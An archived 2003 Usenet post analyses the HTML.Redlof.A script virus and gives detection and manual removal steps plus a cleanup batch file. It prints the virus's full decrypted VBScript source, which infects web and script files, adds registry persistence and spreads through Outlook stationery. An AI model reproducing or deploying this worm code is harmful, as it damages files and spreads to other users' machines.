Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Paper on the HTML.Redlof.A virus

1 view
Skip to first unread message

Gumbo

unread,
Jan 3, 2003, 4:45:40 PM1/3/03
to
Perhaps this is the second post about a full virus disassembly which is
still running strong in the wild.
I shall be talking about the HTML.Redlof.A "virus' which affects computers
running Windows having Windows Scripting Host activated

Introduction:
-------------
Redlof is actually a HTML virus which can infect the user in the following
ways:

1.User opens a webpage infected with the virus
2.User opens a folder(with "View as Web Page" option enabled) infected with
the virus

After the first instance, the virus opens files of type .htt, .html, .htm,
.jsp, .asp, .php in the current folder, traverses up the tree, the "My
Documents" folder and sub folders
It appends itself to Folder.htt in the current and/or to
C:\WinPath\Web\Folder.htt, but before infection backups the clean copies to
Web\KJWALL.GIF (Folder.HTT) and System32\KJWALL.GIF (DeskTop.INI)
It writes another copy of itself into file "Kernel.dll" or
"kernel32.dll"(provided it's NOT Micorsoft's own core) and registers DLL
files to run WScript (WSH core) when they are loaded
Based on the Windows OS, either Kernel.dll or Kernel32.dll is loaded at
startup.Thus, every file of type given above when opened are infected.
It writes to the registry, and Outlook keys to send a copy of itself every
time a mail is sent.The virus is incorporated into the HTML formatting of
the mail itself and thus appears
transparent to the user.
It also keeps the heart of the virus encrypted in a variable named
"ExeString" and it's decrypted during activation
I have posted the decrypted source with is post at the end.

How do I know if I am infected ?
--------------------------------

Your AV should be the first one to indicate it.However, probably it will NOT
be able to clean it and end up Quarantining it.
You can also manually check for the following files on your HDD
C:\WINDOWS\WEB\KJWALL.GIF
C:\WINDOWS\SYSTEM32\KJWALL.GIF
C:\WINDOWS\SYSTEM\KERNEL.DLL

Don't delete ANY of the above files now !
Also, you can know if it's active by
1.Create an empty .txt file and rename it to .html.It should be 0 bytes
2.Click on it.Then close it.If its size has increased to approx 12 Kbytes
automatically, then you ARE infected

Oh my god !
-----------

You can easily get your system clean, by yourself.Follow the steps:

1.Using the Windows FIND tool (Start>Find), search for ANY file containing
the text "KJ_Start()".You should get quite a lot!
Rename ALL of them to .VIR
[E.g rename Filename.HTML to Filename.HTML.VIR]
NOTE:Replace C:\Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm with a clean one !

2.Rename(or delete) Folder.htt and Desktop.ini.

3.Using MSCONFIG, uncheck the entry "Kernel32" linked to the file kernel.dll
(or kernel32.dll- but make sure it isn't Microsoft's) to stop it from
loading at startup.
If you are a Windows 2K user, open REGEDIT, goto
[HKLOCALMACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN] and remove
the entry for
"Kernel32"

4.Boot to Real Mode MSDOS.
CD to the Web directory and delete Folder.htt and desktop.ini
Copy C:\WinPath\Web\kjwall.gif as Folder.htt and
C:\WinPath\System32\kjwall.gif as Desktop.ini
Delete kernel.dll from C:\WinPath\System\kernel.dll

Now you can do the following from either DOS or from Windows, which ever you
are comfortable with:

Open the files you had renamed .VIR in any text editor like Notepad and
search for the line(s)
<XMP><!--Incase Neworder board renders the HTML>
<!--Start Portions of virus code,search for the following in infected
files-->

<html><BODY text=black bgcolor=white onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest
HEIGHT=0 WIDTH=0 ... .. .. (etc)

till the lines(s)

Execute ThisText
</script>
</BODY>
</HTML>

<!--End Portions of virus code, end searching till here.Typically this
should be at the very end of the infected file -->
</XMP><!--Incase Neworder board renders the HTML>

Delete the WHOLE portion.Now the file is cleaned, and you can rename it back
to what it was
Repeat this process for all the files (sorry ! I know it's kinda tedious -
but if the pages conained important data, you will recover a lot)
Now do a FULL system scan with your AV after getting the very latest
updates, and make sure you are clean, for even ONE stray file will render
all the above work useless!!

How do I save myself from furthur attacks ?
-------------------------------------------

If you are sure, you can just REMOVE the Windows Scripting Host from your
Windows. Goto "Add Remove Programs" in Control Panel and select the Windows
Setup tab.Click on "Accessories" and uncheck "Windows Scripting Host"
Click on Apply and you should be done.Just to make sure, search for the file
WScript.EXE and just delete it too if you find it!

Conclusion
----------

Thank your stars that the virus has no serious payload.WSH was needed in
only old apps mainly for Dial-Up users connecting to shell accounts to
automate scripting jobs
As far as I know, you really DO NOT need it now.
The "virus" is indeed a VERY INNOVATIVE idea by the programmer, but I should
NOT say that it has used an "exploit" for the virus uses a feature which can
propagate on ANY platform which renders TML.However, it DOES exploit the WSH
in Windows.Perhaps I am not the first person to recommend people from
removing WSH from thier system ;)

BTW: If you find any error (I know there might be) or wrong understanding on
my part, just mail to me at kbshan...@yahoo.com.Be clear about what you
say.
Please DO NOT spam me though ! Please spare me that !

Here's the code which forms the heart of the virus and is encrypted in
infected file(s):
----------------------------------------------------------------------------
---------------------
<XMP>
<!--Start code -->
<!-- Hope the Edge engine does NOT render the following code

Dim InWhere,HtmlText
,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" &
vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" &
"vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:"
& "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion =
WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook
Express\MediaVer")
WsShell.RegWrite
"HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook
Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use
Stationery",1,"REG_DWORD"
Call
KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Out
look Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call
KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Out
look Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery
Name",ShareFile)
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\Editor
Preference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging
Subsystem\Profiles\Microsoft Outlook Internet
Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook
Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\Edito
rPreference",131072,"REG_DWORD"
Call
KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSetti
ngs\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft
Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",
StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath &
"system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content
Type","application/x-msdownload"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\
vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath &
TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254C
A5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C0
4F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) -
Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)

CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook
Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP"
Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) =
UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " &
OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) &
"""&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " &
OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum =
Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum =
34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod
4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar =
vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar =
vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText &
TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " &
"""" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET
NAME=KJ""&""_guest HEIGHT=0 WIDTH=0
code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" &
"/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script
language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<"
& "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath &
"system32\kjwall.gif"
End If
End Function
-->
</XMP>
<!-- End of code -->

Here's a batch file which you can use to clean the folder.htt and
desktop.ini
RUN IF ONLY IF YOU ARE INFECTED !!

--------------Start CLEAN.BAT-------------------
REM It's assumed that you have your windows on C:\WINDOWS
REM If not, change it accordingly
@ECHO OFF
IF EXIST C:\WINDOWS\SYSTEM\KERNEL.DLL DEL C:\WINDOWS\SYSTEM\KERNEL.DLL
IF EXIST C:\WINDOWS\WEB\FOLDER.HTT DEL C:\WINDOWS\WEB\FOLDER.HTT
MOVE C:\WINDOWS\WEB\KJWALL.GIF C:\WINDOWS\WEB\FOLDER.HTT
ECHO Y|MOVE C:\WINDOWS\SYSTEM32\KJWALL.GIF C:\WINDOWS\WEB\DESKTOP.INI
IF EXIST C:\WINDOWS\system32\desktop.ini DEL C:\WINDOWS\system32\desktop.ini
COPY C:\WINDOWS\WEB\DESKTOP.INI C:\WINDOWS\system32\desktop.ini
ECHO System is clean !
ECHO Make sure you have cleaned C:\Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm !
PAUSE
--------------End Clean.BAT--------------------

0 new messages